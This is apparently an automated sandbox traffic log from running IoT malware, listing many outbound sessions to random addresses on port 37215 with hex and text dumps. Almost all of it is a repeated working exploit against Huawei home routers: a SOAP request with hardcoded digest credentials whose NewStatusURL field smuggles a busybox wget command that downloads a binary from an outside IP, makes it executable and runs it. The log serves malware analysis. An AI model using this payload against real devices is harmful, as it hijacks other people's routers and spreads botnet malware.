                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              943192.168.2.153542437.23.198.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539851904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              944192.168.2.154530091.168.205.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539880037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              945192.168.2.154137437.173.139.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539890051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              946192.168.2.1546820181.40.141.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539900064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              947192.168.2.154901894.2.20.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539949894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              948192.168.2.1552368164.117.226.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539952993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              949192.168.2.1552954181.73.99.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539978027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              950192.168.2.1552524197.49.114.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.539978027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              951192.168.2.1534620138.124.253.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540018082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              952192.168.2.1549174190.171.78.6837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540056944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              953192.168.2.154764631.93.218.23737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540076971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
